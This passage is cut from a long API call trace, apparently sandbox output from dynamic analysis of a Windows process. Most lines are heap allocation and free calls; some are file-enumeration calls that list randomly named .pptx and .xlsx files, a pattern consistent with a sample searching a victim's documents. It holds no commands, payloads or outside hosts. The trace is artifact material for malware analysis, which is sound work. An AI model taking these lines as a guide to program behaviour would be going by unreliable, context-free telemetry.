hHeap=0x8a0000) returned 1 [0157.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.364] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.365] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.365] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8e2a80 [0157.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d50 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.366] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaa3530, ftCreationTime.dwHighDateTime=0x1d5ccc5, ftLastAccessTime.dwLowDateTime=0x6f08b940, ftLastAccessTime.dwHighDateTime=0x1d5ab25, ftLastWriteTime.dwLowDateTime=0x6f08b940, ftLastWriteTime.dwHighDateTime=0x1d5ab25, nFileSizeHigh=0x0, nFileSizeLow=0xfcf2, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="dXJHIETG4kltTzJ3VC.pptx", cAlternateFileName="DXJHIE~1.PPT")) returned 1 [0157.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cb0 [0157.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d50 [0157.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x110) returned 0x9091f8 [0157.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.369] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.369] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.369] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.369] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862f1b80, ftCreationTime.dwHighDateTime=0x1d57779, ftLastAccessTime.dwLowDateTime=0x8cd8dec0, ftLastAccessTime.dwHighDateTime=0x1d57a90, ftLastWriteTime.dwLowDateTime=0x8cd8dec0, ftLastWriteTime.dwHighDateTime=0x1d57a90, nFileSizeHigh=0x0, nFileSizeLow=0x138f3, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="F8kGUIlkgYER.xlsx", cAlternateFileName="F8KGUI~1.XLS")) returned 1 [0157.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cb0 [0157.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.370] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.370] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e00 [0157.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d50 [0157.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.372] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc053e0, ftCreationTime.dwHighDateTime=0x1d57286, ftLastAccessTime.dwLowDateTime=0x290dce00, ftLastAccessTime.dwHighDateTime=0x1d5aa6f, ftLastWriteTime.dwLowDateTime=0x290dce00, ftLastWriteTime.dwHighDateTime=0x1d5aa6f, nFileSizeHigh=0x0, nFileSizeLow=0xa915, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="g_g2urcnwKcCd17PjNc.xlsx", cAlternateFileName="G_G2UR~1.XLS")) returned 1 [0157.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db330 [0157.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cb0 [0157.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee3c8 | out: hHeap=0x8a0000) returned 1 [0157.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db378 [0157.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db330 | out: hHeap=0x8a0000) returned 1 [0157.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.373] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.373] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e00 [0157.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2a80 [0157.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 